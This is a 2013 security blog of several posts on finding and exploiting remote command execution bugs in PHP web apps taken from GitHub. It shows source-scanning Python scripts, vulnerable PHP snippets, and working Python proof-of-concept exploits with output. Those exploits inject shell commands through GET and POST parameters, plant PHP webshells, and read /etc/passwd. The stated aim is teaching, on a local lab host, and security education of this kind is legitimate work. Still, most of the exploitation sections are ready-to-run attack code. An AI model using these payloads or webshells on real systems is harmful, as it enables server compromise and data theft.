Monday 24 June 2013

[EN] Any JavaScript?

Today, durning surfing at net I found a nice link...

Few days (or weeks) ago I wrote a very simple (and 'dirty') code that after reading
mentioned link, can be used here to check one idea. ;]

I decide to publish here only a 'few lines' so as a homework, try to add other
functions mentioned at OWASP's publication. Try a little modification
of regexp's, you will find DOM-based vulnerabilities at (from ;) remote host(s).

Remember to use it only against your host.

--- < code > ---
#!/usr/bin/env python
# sialala ;]
#
import re
import urllib2
import sys
import urllib
import os

# defines :
url = sys.argv[1]
fpih = 'first_page.txt'        
replaced = 'replaced.txt'      
found_log_here = 'FOUND.log'
save_js_log = 'savejs.txt'
extract_js = './output/'
final_log = 'FINAL.log'

# --------------------------------------------
# locate few vulns in files 'here'
def tryhere(extract_js):
  final = open(final_log,'w')

  for extract_js, extract_jss, filenames in os.walk(extract_js):
    print final.writelines(('[+] dirname to check: %s\n') % ( extract_js))
    print '\n___________________________________________'
    for filename in filenames:
      def reada_file(filename):
        print  final.writelines(('[+] --- filename ------------------------------------ > %s\n') % (filename))

        with open(extract_js+'/'+filename,'r') as fd:
          n_line = 0
          page_file = fd.readlines()

          for line in page_file:
            n_line += 1

            if line.find('function ') != -1:
              print  final.writelines('\t[!] =========> [+] Found FUNCTION NAME, check at source:\n')
              print  final.writelines(('\t[ -> line number: [ %d ]\n') % (n_line))
              print  final.writelines(('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s\n\n') % (line.replace(';',';\n\n')))
              print  final.writelines('-------> next ----> bug ---> -------------\n')
            elif (line.find('document.write') != -1) & (line.find('+') != -1) & (line.find('"') != -1):
              print  final.writelines('\t[!] =========> [+] Found DOCUMENT.WRITE, check at source:\n')
              print  final.writelines(('\t[ -> line number: [ %d ]\n') % (n_line))
              print  final.writelines(('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s\n\n') % (line))
              print  final.writelines('-------> next ----> bug ---> -------------\n')

            elif line.find('eval(') != -1:
              print  final.writelines('\t[!] =========> [+] Found EVAL() FUNCTION, check at source:\n')
              print  final.writelines(('\t[ -> line number: [ %d ]\n') % (n_line))
              print  final.writelines(('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s\n\n') % (line))
              print  final.writelines('-------> next ----> bug ---> -------------\n')

            n_line=n_line+1

      print ''
      reada_file(filename)
## end get_files()
# --
# --------------------------------------------
# f() from http://code.activestate.com/recipes/496685-downloading-a-file-from-the-web/
# big thanks for an idea!
#
def download(url):

  webFile = urllib.urlopen(url)
  localFile = open(extract_js+url.split('/')[-1], 'w')
  localFile.write(webFile.read())
  webFile.close()
  localFile.close()

# eof ()
# -
# --------------------------------------------
# GET this URL and save it to fpih-log file
#
def checkThisUrl(url):
  print '[+] URL to check: ', url

  response = urllib2.urlopen(url)       # GET this URL
  html_page = response.readlines()      # read it per line

  fd = open(fpih,'w')                   # open fpih to write

  for line in html_page:                # save lines to fpih
    fd.writelines(line)

  fd.close()
  print '[+] Content of URL saved to : ',fpih

# eof()
# ----

# open fpih-log and replace ; for ;\n\n to specify
# JS code. (I know it's now 'the best of the best'
# method, but it will help with few simple examples.
# there is no problem to extend it in the future).
#
def sort_file(file):
  print '[+] No we will sort log file a little.\n'

  fd = open(fpih,'r')                   # read fpih
  fdRepLog = open(replaced,'w')         # create output log

  fd_page = fd.readlines()

  for line in fd_page:
    line = line.replace(';',';\n\n')
    if line:
      line = line.replace('><','>\n<')
      print fdRepLog.writelines(line)

  fdRepLog.close()
  fd.close()

# eof()
# ----
# search for JS files in code
#
def search_js(file):
  fd = open(replaced,'r')
  lines = fd.readlines()

  found_log = open(found_log_here,'w')
  n_line = 0

  print found_log.writelines('\n[+] Searching for code from JS files:\n')

  for line in lines:
    if line.find('<script ') != -1:
      if line.find(' src="http:') != -1:
        print found_log.writelines(('[!] FOUND: HTTP in SCRIPT tag, line : %d .\n[+] Contain: \n %s') % (n_line,line))
        n_line = n_line + 1
        print found_log.writelines('\n\n--------------------------- next bug ---------------------------------->\n\n')
      elif line.find(' src="/') != -1:
        print found_log.writelines(('[!] FOUND: WWW-ROOT in SCRIPT tag, line : %d .\n') % (n_line))
        print found_log.writelines(('[+] Contain : \n %s') % (line))
        print found_log.writelines('\n\n--------------------------- next bug ---------------------------------->\n\n')
        n_line = n_line + 1
  found_log.close()

# eof()
# ----
# try to get content of JS files found at URL (saved file)
#
def try2get(file):
  fd = open(found_log_here,'r')         # here we're looking for JS links
  fd_file = fd.readlines()              # per line
  save_js = open(save_js_log,'w')

  for line in fd_file:
    r = re.compile(' src="(.*?)"') # regex it
    m = r.search(line)          # match in line

    if m:
      txt = m.group(1)

      if line.find('http:') != -1:
        print save_js.writelines(('%s \n') % (txt))
        download(txt)
      else:
        print save_js.writelines(('%s%s \n') % (url,txt))
        download(url+txt)


  fd.close()
  save_js.close()

# eof
# ----
# --------------------------------------------
# hi:

if len(sys.argv) == 2:
  checkThisUrl(url)
  sort_file(fpih)
  search_js(replaced)
  try2get(found_log_here)
  tryhere(extract_js)

else:
  print '[-] try: ', sys.argv[0] ,' URL\n'


--- < code > ---

Read the code to run this code correctly. ;]

Cheers o/


(Hint from OWASP Code Review:
--- < code > ---

document.cookie
document.referrer
document.attachEvent
document.body
document.body.innerHtml
document.body.innerText
document.close
document.create(...)

and so on... Read it. ;)
--- < code > ---

o/

Tuesday 18 June 2013

[EN] RCE - another lesson (2:0)

RCE - LAB 2:0
====================================================================
And again, few examples of vulnerable codes. Few poc's included.

Have fun a take care ;)

====================================================================
All examples you will find at www.github.com:
====================================================================

1. Scilab-WebApp / db-interaction / create-delete-file.php -- (year ago)

--- < code > ---
<?php
    if(!empty($_POST['file']) && !empty($_POST['directory'])){
        if($_POST['action']=="crear"){
            shell_exec('touch ../'.$_POST['directory'].'/'.$_POST['file']);
        }
        if($_POST['action']=="borrar"){
            shell_exec('rm ../'.$_POST['directory'].'/'.$_POST['file']);
        }
        if($_POST['action']=="comprimir"){
            shell_exec('zip ../'.$_POST['directory'].'/files.zip ../'.$_POST['directory'].'/'.$_POST['file']);
        }
        if($_POST['action']=="guardar"){
            shell_exec('echo "'.$_POST['file'].'" > ../'.$_POST['directory']);
        }
    }
?>

--- < code > ---

As you can see this file is a part of bigger webapp. For our purpose, to learn
how to exploit RCE vulnerabilities, we will use only this one file. Check it out:

To exploit this vulnerability mentioned ('../') directory must be writeable.
Chmod it now (or move your 'create...' file to test-dir - 'xx' dir at my box).

Let's see, what 'actions' we have (to exploit ;]).

PoC will need this settings: (must send all via HTTP POST)
    - actions=borrar
    - directory=someDir+our;payload
    - file=whate.ver

From 'directory' parameter (for this 'action') we should have a very easy way
to exit to let's say 'bash-shell-query-line'. From here, we can add our command.

Let's create a little PoC:

--- < code > ---
kuba@lap:~/src/py/p0c$ cat scilab-webapp-poc.py
#!/usr/bin/env python
# * remember to chmod 777 to 'xx' directory
# --
import httplib, urllib
import sys
url = sys.argv[1]+':80'
path = '/kuba/github/xx/create-delete-file.php'

poc = 'echo \'<?php $c=$_GET[\'c\'];echo system($c);?>\' >> xxx.php ' # add simple backdoor webshell

params = urllib.urlencode({'action': 'borrar','directory':'./;'+poc+';#' ,'file': 'xxx.php'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(url)
conn.request("POST", path , params, headers)
response = conn.getresponse()

data = response.read()

if response.status == 200:
  print 'Server : ', response.status, response.reason
  print 'Your shell is /xxx.php\n'

else:
  print 'something\'s wrong... :C \n'
kuba@lap:~/src/py/p0c$

--- < code > ---


Output from this simple poc should be similar to this one below:
--- < code > ---
kuba@lap:~/src/py/p0c$ ls -la /home/kuba/public_html/github/xx/
total 12
drwxrwxrwx 2 kuba kuba 4096 Jun 18 15:12 .
drwxrwxr-x 9 kuba kuba 4096 Jun 18 14:48 ..
-rwxrwxrwx 1 kuba kuba  623 Jun 18 15:00 create-delete-file.php
kuba@lap:~/src/py/p0c$ ./scilab-webapp-poc.py 192.168.1.102
Server :  200 OK
Your shell is /xxx.php

kuba@lap:~/src/py/p0c$ ls -la /home/kuba/public_html/github/xx/
total 16
drwxrwxrwx 2 kuba     kuba     4096 Jun 18 15:20 .
drwxrwxr-x 9 kuba     kuba     4096 Jun 18 14:48 ..
-rwxrwxrwx 1 kuba     kuba      623 Jun 18 15:00 create-delete-file.php
-rw-r--r-- 1 www-data www-data   37 Jun 18 15:20 xxx.php
kuba@lap:~/src/py/p0c$ cat /home/kuba/public_html/github/xx/xxx.php
<?php $c=$_GET[c];echo system($c);?>
kuba@lap:~/src/py/p0c$

--- < code > ---

If you want, create PoC's for other 'actions' (let's say, as a 'homework' ;) )


========================================================
2.  Gravel / gravel-web / adduseraction.php


--- < code > ---
<?php
$username = $_POST["name"];
$executeString = 'grvladmin add user '.$username;
//echo $executeString;
$results = shell_exec($executeString);
header("Location: addusers.php");
?>

--- < code > ---

Great let's see, if we can set 'our-evil-name' for this POST parameter:


--- < code > ---
kuba@lap:~/src/py/p0c$ ./adduseraction-poc.py 192.168.1.102
Server :  302 Found
Your shell should be at 777dir//xxx.php

kuba@lap:~/src/py/p0c$ ls -la /home/kuba/public_html/github/rcelab/777dir
total 16
drwxrwxrwx 2 kuba     kuba     4096 Jun 18 15:30 .
drwxrwxr-x 6 kuba     kuba     4096 Jun 18 15:25 ..
-rw-r--r-- 1 www-data www-data   41 Jun 18 10:49 hihi.php
-rw-r--r-- 1 www-data www-data   37 Jun 18 15:30 xxx.php

kuba@lap:~/src/py/p0c$  cat adduseraction-poc.py
#!/usr/bin/env python
import httplib, urllib
import sys
url = sys.argv[1]+':80'
path = '/kuba/github/rcelab/adduseraction.php'
poc = 'echo \'<?php $c=$_GET[\'c\'];echo system($c);?>\' >> ./777dir/xxx.php ' # add backdoor webshell

params = urllib.urlencode({'name': 'x;'+poc+';#'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain",'Location':'addusers.php'}
conn = httplib.HTTPConnection(url)
conn.request("POST", path , params, headers)
response = conn.getresponse()

data = response.read()

if response.status == 302:
  print 'Server : ', response.status, response.reason
  print 'Your shell should be at 777dir//xxx.php\n'

else:
  print response.status, response.reason
  print 'something\'s wrong... :C \n'
kuba@lap:~/src/py/p0c$

--- < code > ---

Browser? Ok: http://192.168.1.102/kuba/github/rcelab/777dir/xxx.php?c=id
Response like: uid=33(www-data) gid=33(www-data) groups=33(www-data)

Great.

Durinng this search you will probably find similar directories to this one:
https://github.com/BayshoreNetworks/l7secassay

Test it to.

========================================================
3.  lab-virtual-ufc / lab_virtual_teoria / students / renameFile.php

--- < code > ---
<?
$login = $_GET["login"];
$area = $_GET["area"];
$oldName = $_GET["oldName"];
$newName = $_GET["newName"];

system("cd $login && cd $area && mv $oldName $newName");
?>
--- < code > ---


What to do here? Let's put a webshell via this vulnerability.

--- < code > ---
kuba@lap:~/src/py/p0c$ cat renameFile-poc.py
#!/usr/bin/env python
# to exploit this vuln, we need dir where we can write file
# --
import urllib2
import sys

host = sys.argv[1]
cmd = 'x;echo%20\'<?php%20$c=$_GET[\'c\'];echo%20system($c);?>\'%20>%20./777dir/sh.php'
vulnurl = '/kuba/github/rcelab/renameFile.php?login='+cmd+'&area=./&oldName=a&newName=b'


vuln = host+vulnurl

if len(sys.argv) == 2:
  check = urllib2.urlopen(vuln)
  page = check.readlines()

  print 'RCE PoC for Tourism WebApp at: ',host
  print '[+] add webshell...'
  print '[+] your shell should be now in:  777dir/sh.php'

  for line in page:
    print line

  check.close()
else:
  print 'host cmd...\n'
kuba@lap:~/src/py/p0c$

--- < code > ---

Now if we'll run it, we should see something like:


--- < code > ---
kuba@lap:~/src/py/p0c$ ./renameFile-poc.py http://192.168.1.102
RCE PoC for Tourism WebApp at:  http://192.168.1.102
[+] add webshell...
[+] your shell should be now in:  777dir/sh.php
kuba@lap:~/src/py/p0c$

--- < code > ---

As you see after those 3 examples, searching for bugs can be very funny job :)
You can develop your skills and help other people with their projects.

Let me know if you have any questions.

Cheers!
o/


[EN] RCE - another lesson

Hi,

few days ago I wrote short post about finding potential vulnerable piece of code at github.com

Today we will use it to find few vulnerable 'webapps' and write PoC's for vulnerabilities we will find.

What we will actually need is:
- python
- browser
- internet connection (in case you have a linux with apache/php server installed)

In our 'test-server-box' we will need a directory to store our vulnerable-example-webapp-codes.
For this case let it be /home/kuba/public_html/github/.

How to start.

It's not a problem to download a lot of MBs from github. But checking it all
'manually' can be painful. Let's make a trick to speed-up our work a little.

At this stage, what we want 'the most' is remote command execution vulnerability somewhere in the code.

Ok.

Let check again post from seclists.org to find out how we can search for vulnerable code located
at github.com.

In case you don't know what function(s) you need to find (to exploit it via RCE),
maybe this page will interest you.



As we know, we are looking for RCE vulnerabilities. This means we're looking
for piece of code, where user can send 'some value' to webapp, and (because of
no filtering for this 'value') this webapp will 'execute' (via function-to-exec) this 'value'.


Ok.



Code below is based at only one function (shell_exec for our examples).
Start this code agains few webapps that you found at GitHub. It should find
few 'vulnerabilities'. Check this out:

Our 'simple scanner' found something interesting:

--- output ---
[+] --- filename ------------------------------------ >  process.php
        [!] =========> [+] Found RCE bug, check at source:

        [ -> line number: [ 3 ]

        [ check parameter here, maybe it's not/wrong filtered :]
 $output = shell_exec($_GET['command']);

-------> next ----> bug ---> -------------
--- output ---

As you will see after a while playing this code, there is no '100% vulnerable code found'.
This is just as 'see here, maybe its useful' output. ;) You should read the code anyway!


Ok. So now we have few webapps downloaded from GitHub.

Let's extract them to our www-root (/home/kuba/public_html/github/):

Next step is to write a simple 'scanner-code' to find out if there is any vulnerability (RCE
via shell_exec in this case, but there is no problem to extend this 'scanner' to find more vulnerable functions/behaviors).

--- code ---

kuba@lap:~/src/py/siema$ cat siema-rcelab.py
#!/usr/bin/env python
import re
import sys
import os

dirname=sys.argv[1]

# get_files - listuje katalog z plikami
def get_files(dirname):
  for dirname, dirnames, filenames in os.walk(dirname):
    # print path to all filenames.
    print '[+] dirname to check: ', dirname
    print '\n___________________________________________'
    for filename in filenames:
      # czyta plik podany z argv[1]
      # nastepnie, szuka w nim kolejno 'podatnosci'...
      def reada_file(filename):
        print '[+] --- filename ------------------------------------ > ',filename

        with open(dirname+'/'+filename,'r') as fd:
          n_line = 0
          for line in fd.readlines():
            n_line += 1

            rce_regex = re.compile(r'((shell_exec[(]|passthru[(]|system[(]|curl_exec[(])(.*)[$].*)')
            found = re.search(rce_regex, line)
            if found:
              print ('\t[!] =========> [+] Found RCE bug, check at source:\n')
              print ('\t[ -> line number: [ %d ]\n') % (n_line)
              print ('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s') % (line)
              print '-------> next ----> bug ---> -------------\n'

# ------------------------------ end of tests
            n_line=n_line+1
        # end reada_file()

      print ''
      reada_file(filename)
## end get_files()

##################
#   MAIN:
##################
print '[+] Checking started:\n'
get_files(dirname)
print '\n'
print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
kuba@lap:~/src/py/siema$

--- code ---

(Of course, similar output we can get from simple grep command, but this is not the case right now.)


Later, as a draft-of-idea I will add here extended version of this 'python-scanner'.

Let's start it:

kuba@lap:~/src/py/siema$ ./siema-rcelab.py /home/kuba/public_html/github/rcelab/tourism/ > tourism.log

In tourism.log we can find a lot of strings so, I will suggest you 'read' this file by 'less' command:

$ less tourism.log... (Type: /text to find 'text'. Let's check for /shell_exec or /Found)
(...)
[+] --- filename ------------------------------------ >  process.php
        [!] =========> [+] Found RCE bug, check at source:

        [ -> line number: [ 3 ]

        [ check parameter here, maybe it's not/wrong filtered :]
 $output = shell_exec($_GET['command']);

-------> next ----> bug ---> -------------
(...)


Ok, it seems that our super-code found something! ;]

We can verify it in two ways: first (in this case) via browser (because it is a simple GET request) and second: via our simple proof-of-concept code.

Open your browser and go to:
http://192.168.1.102/kuba/github/rcelab/tourism/Philippine-Tourism-master/

at this stage it was big surprise for me, that this 'webapp' with RCE vulnerability
is actually a WordPress installation ;)


Our vulnerable file is:
./Philippine-Tourism-master/dashboard/git/process.php

After default installation, let's check if we can exploit this vulnerability via browser:

... of course we can! ;]
(By the way, what is 'pino' you will find at GitHub in the 'way' mentioned before:

).


Ok, so first method (browser) is working, let's find out, how we can write a simple python PoC
to exploit this vulnerbaility:

--- code ---

kuba@lap:~/src/py$ cat pino-poc.py
#!/usr/bin/env python
import urllib2
import sys

#host = 'http://192.168.1.102'
host = sys.argv[1]
#cmd = 'id;ls%20-la;uname%20-a'
cmd = sys.argv[2]
vulnurl = '/kuba/github/rcelab/tourism/Philippine-Tourism-master/dashboard/git/process.php?command='+cmd


vuln = host+vulnurl

if len(sys.argv) == 3:
  check = urllib2.urlopen(vuln)
  page = check.readlines()

  print 'RCE PoC for Tourism WebApp at: ',host

  start = '<pre>'
  stop = '</pre>'
  print 'exec: ',cmd

  for line in page:
    print line[len(start):-len(stop)]

  check.close()
else:
  print 'host cmd...\n'

--- code ---

Ok, great. now let's check if it's working:

--- code --- 
kuba@lap:~/src/py$ ./pino-poc.py http://192.168.1.102 uname -a
RCE PoC for Tourism WebApp at:  http://192.168.1.102
exec:  uname -a

Linux lap 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
kuba@lap:~/src/py$

--- code ---

As you can see, vulnerability is 'verified'. ;]

If you will have any troubles with command, try like this:

(...)
kuba@lap:~/src/py$ ./pino-poc.py http://192.168.1.102 cat+/etc/passwd
RCE PoC for Tourism WebApp at:  http://192.168.1.102
exec:  cat+/etc/passwd
root:(...)
(...)

It should work too.



-- Kamikaze

Let's try how we can exploit another vulnerable webapplication.

kuba@lap:~/src/py/siema$
./siema-rcelab.py /home/kuba/public_html/github/rcelab/kamikaze/kamikaze-master/|less

(/Found ... to search for RCE ;])

(...)

[+] --- filename ------------------------------------ >  bloodywork.php
        [!] =========> [+] Found RCE bug, check at source:

        [ -> line number: [ 7 ]

        [ check parameter here, maybe it's not/wrong filtered :]
        shell_exec($cmd);

-------> next ----> bug ---> -------------

(...)

Let's check how bloodywork.php file looks like (and where there is a shell_exec, and what is $cmd param;)):


kuba@lap:~/public_html/github/rcelab/kamikaze/kamikaze-master$ cat bloodywork.php
<?php
        $controlvalue = $_GET["control"];
        $cmd = "./IPC ".$controlvalue;
        shell_exec($cmd);
?>
kuba@lap:~/public_html/github/rcelab/kamikaze/kamikaze-master$

Great.

So our PoC for example before, we can modify a little to exploit 'Kamikaze':
After few modification, code should looks like this:

--- kamikaze-poc.py ---

kuba@lap:~/src/py$ cat kamikaze-poc.py
#!/usr/bin/env python
# to use this PoC we'll need a directory 777 at remote host!
#
import urllib2
import sys

#host = 'http://192.168.1.102'
host = sys.argv[1]
#cmd = 'id;ls%20-la;uname%20-a'
shell = sys.argv[2]
path = '/github/rcelab/kamikaze/kamikaze-master/'
vulnurl = '/bloodywork.php?control=x;/bin/echo+\'<?php+$c=$_GET[\'c\'];echo+shell_exec($c);?>\'+>+/home/kuba/public_html/'+path+'../../777dir/'+shell

vuln = host+path+vulnurl

if len(sys.argv) == 3:
  check = urllib2.urlopen(vuln)
  page = check.readlines()

  print 'RCE PoC for Kamikaze WebApp at: ',host
  print '\n-----\nshell should be here: ',path+shell


  check.close()
else:
  print 'host/page/ your-shell-at-webroot\n'
kuba@lap:~/src/py$

--- kamikaze-poc.py ---


(To exploit this vulnerability, you must know location of directory when you can write (chmod 777).
As you can see I decide to create one (777dir) at my /github/'s root (just to show you,
how other this kind of vulnerabilities can be exploited.)

Run poc to see a shell.php in 777dir:

--- code ---
kuba@lap:~/src/py$ ./kamikaze-poc.py http://192.168.1.102/kuba/ hihi.php
RCE PoC for Kamikaze WebApp at:  http://192.168.1.102/kuba/
-----
shell should be here:  /github/rcelab/kamikaze/kamikaze-master/hihi.php

--- code ---

Checking...

--- code ---
kuba@lap:~/src/py$ ls -la /home/kuba/public_html/github/rcelab/777dir/
total 12
drwxrwxrwx 2 kuba     kuba     4096 Jun 18 10:49 .
drwxrwxr-x 5 kuba     kuba     4096 Jun 18 10:39 ..
-rw-r--r-- 1 www-data www-data   41 Jun 18 10:49 hihi.php

kuba@lap:~/src/py$ cat /home/kuba/public_html/github/rcelab/777dir/hihi.php
<?php $c=$_GET[c];echo shell_exec($c);?>

kuba@lap:~/src/py$
--- code ---

Now in our browser we can type:
http://192.168.1.102/kuba/github/rcelab/777dir/hihi.php?c=id

Exploited.


For both cases we used GET method to exploit vulnerable code.

In third example we will send our exploit via POST.

At mentioned GitHub, we can easlz find POST-variable vulnerable to RCE.

Check it out:

kuba@lap:~/src/py/siema$ ./siema-rcelab.py /home/kuba/public_html/github/rcelab/vauteck/aggreg_platform-master/| less
(/Found... aby znalezc RCE)

--- code ---

[+] --- filename ------------------------------------ >  exec.php
        [!] =========> [+] Found RCE bug, check at source:

        [ -> line number: [ 5 ]

        [ check parameter here, maybe it's not/wrong filtered :]
        echo json_encode(shell_exec($cmd));

-------> next ----> bug ---> -------------

--- code ---

Great. Let's see what's in the code:

--- code ---

kuba@lap:~/public_html/github/rcelab/vauteck/aggreg_platform-master/www$ cat exec.php
<?php
        $cmd = $_POST["cmd"];
        echo json_encode(shell_exec($cmd));
?>
kuba@lap:~/public_html/github/rcelab/vauteck/aggreg_platform-master/www$

--- code ---

Ok.

We can now start to write a simple proof-of-concept using POST method to send the payload.

--- example poc-code ---

kuba@lap:~/src/py$ cat POST-poc2.py
#!/usr/bin/env python

import httplib, urllib
import sys

target = sys.argv[1]
poc = sys.argv[2]
path = '/kuba/github/rcelab/vauteck/aggreg_platform-master/www/exec.php'
url = target + path

headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
params = 'cmd='+poc

conn = httplib.HTTPConnection(target)
conn.request('POST',path,params,headers)
response = conn.getresponse()

if response.status == 200:
  print '[+] exploit works: ',response.status, response.reason
  data = response.read()

  print data

else:
  print '[-] sploit failed :C\n'
kuba@lap:~/src/py$

--- example poc-code ---

And run it, like:

--- code ---

kuba@lap:~/src/py$ ./POST-poc2.py 192.168.1.102 id
[+] exploit works:  200 OK
"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"

kuba@lap:~/src/py$ ./POST-poc2.py 192.168.1.102 uname
[+] exploit works:  200 OK
"Linux\n"

kuba@lap:~/src/py$ ./POST-poc2.py 192.168.1.102 whoami
[+] exploit works:  200 OK
"www-data\n"

kuba@lap:~/src/py$

--- code ---

This is how we create 3 PoC's for 3 vulnerable webapplications:
- RCE via GET
- RCE via POST
- remote webshell creating

In case you want to learn how to find vulnerabilities in webapps and write a little code in python,
maybe code below is for you. This is a simple python-based-scanner for PHP webapps.

As you will see below, 'functions to search for vulns' can be easly extended/changed.
So... have fun! ;)

--- siema2.py ---
#!/usr/bin/env python
import re
import sys
import os

dirname=sys.argv[1]

# get_files - listuje katalog z plikami
def get_files(dirname):
  for dirname, dirnames, filenames in os.walk(dirname):
    # print path to all filenames.
    print '[+] dirname to check: ', dirname
    print '\n___________________________________________'
    for filename in filenames:
      # czyta plik podany z argv[1]
      # nastepnie, szuka w nim kolejno 'podatnosci'...
      def reada_file(filename):
        print '[+] --- filename ------------------------------------ > ',filename

        with open(dirname+'/'+filename,'r') as fd:
          n_line = 0
          for line in fd.readlines():
            n_line += 1
           
            rce_regex = re.compile(r'((shell_exec[(]|passthru[(]|system[(]|curl_exec[(])(.*)[$].*)')
            found = re.search(rce_regex, line)
            if found:
              print ('\t[!] =========> [+] Found RCE bug, check at source:\n')
              print ('\t[ -> line number: [ %d ]\n') % (n_line)
              print ('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s') % (line)
              print '-------> next ----> bug ---> -------------\n'

            fi_regex = re.compile(r'((include[(]|include_once[(])(.*)[$].*)')
            if fi_regex:
              found = re.search(fi_regex, line)
              if found:
#                if (line.find('_GET') != -1) | (line.find('_POST') != -1) :
                print ('\t[!] =========> [+] Found LFI/RFI (include) bug, check at source:\n')
                print ('\t[ -> line number: [ %d ]\n') % (n_line)
                print ('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s') % (line)
                print '-------> next ----> bug ---> -------------\n'

            fi2_regex = re.compile(r'((require[(]|require_once[(])(.*)[$].*)')
            if fi2_regex:
              found = re.search(fi2_regex, line)
              if found:
#                if (line.find('_GET') != -1) | (line.find('_POST') != -1) :
                print ('\t[!] =========> [+] Found LFI/RFI (require) bug, check at source:\n')
                print ('\t[ -> line number: [ %d ]\n') % (n_line)
                print ('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s') % (line)
                print '-------> next ----> bug ---> -------------\n'

            fopen_regex = re.compile(r'((fopen[(]|fwrite[(]|file_get_contents[(]|file_put_contents[(]|fread[(])(.*)[$].*)')
            if fopen_regex:
              found = re.search(fopen_regex, line)
              if found:
                if (line.find('_GET') != -1) | (line.find('_POST') != -1) :
                  print ('\t[!] =========> [+] Found interesting function related to file-write/read. Maybe it\'s bug, check it at source:\n')
                  print ('\t[ -> line number: [ %d ]\n') % (n_line)
                  print ('\t[ check parameter here, maybe it\'s not filtered :]\n %s') % (line)
                  print '-------> next ----> bug ---> -------------\n'
                else:
                  print ('\t[!] =========> [+] Found interesting function related to file-write/read. Maybe it\'s bug, check it at source:\n')
                  print ('\t[ -> line number: [ %d ]\n') % (n_line)
                  print ('\t[ check parameter here, maybe it\'s not filtered :]\n %s') % (line)
                  print '-------> next ----> bug ---> -------------\n'

            preg_regex = re.compile(r'((preg_replace[(]|preg_match[(])(.*)[$].*)')
            if preg_regex:
              found = re.search(preg_regex, line)
              if found:
                if (line.find('_GET') != -1) | (line.find('_POST') != -1) :
                  print ('\t[!] =========> [+] Found interesting function related to *preg_match* write/read. Maybe it\'s bug, check it at source:\n')
                  print ('\t[ -> line number: [ %d ]\n') % (n_line)
                  print ('\t[ check parameter here, maybe it\'s not filtered :]\n %s') % (line)
                  print '-------> next ----> bug ---> -------------\n'
# ------------------------------ end of tests
            n_line=n_line+1
    # end reada_file()

      print ''
      reada_file(filename)
## end get_files()

##################
#   MAIN:
##################
print '[+] Checking started:\n'
get_files(dirname)
print '\n'
print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'

--- siema2.py ---

If you have any questions, feel free to ask.

Once again, have fun! ;)


Tuesday 11 June 2013

[EN] New code, new vulnerabilities - PICOL LFI

Durning one of my project few days ago I wrote another version of my source code scanner.
Another one, because this 'super code' is a never ending story. Maybe I will put here few examples in the future in some kind of 'how to do' this or that. We'll see... ;)

Anyway.
Below, simple example (related to post about nice trick @ seclists.org and questions about 'how I found this webapp' code to tests):





Yes, in this example this is local file include vulnerability in a PICOL Generator .
If we will set 'wrong' php.ini settings, we can make here remote file include attack too.

Anyway, durning a webapp pentest, if we'll find this webapp, server can be 'hacked' ;)

Have fun! at localhost ;]

One more idea if you don't know this site, check it now .;)

o/

Friday 7 June 2013

[EN] Nice RCE to learn RCE ;)

Once uppon a time I saw a post at vulndev.

It was an excellent idea to write about 'how you can find RCE vuln in webapp'.
You can be a good coder, or great auditor, that's great. But maybe to
'see' (or better 'imagine') what can be done via this vulnerability, you should
'see' it at your own 'learning-localhost-server' ;]

Check it out, screen below is a 'one of few webapps' vulnerable. PoCc code is simple GET request
(via browser, via python, GET.sh, whatever you want...).


Ideas about fixing and finding this kind of vulnerabilities you will easly find at OWASP's pages.
There is no reason to write it here again, and again... ;]

If you have any questions about how to find this or other bugs/vulns, just mail me
few words about it. :)

Have a nice day!

o/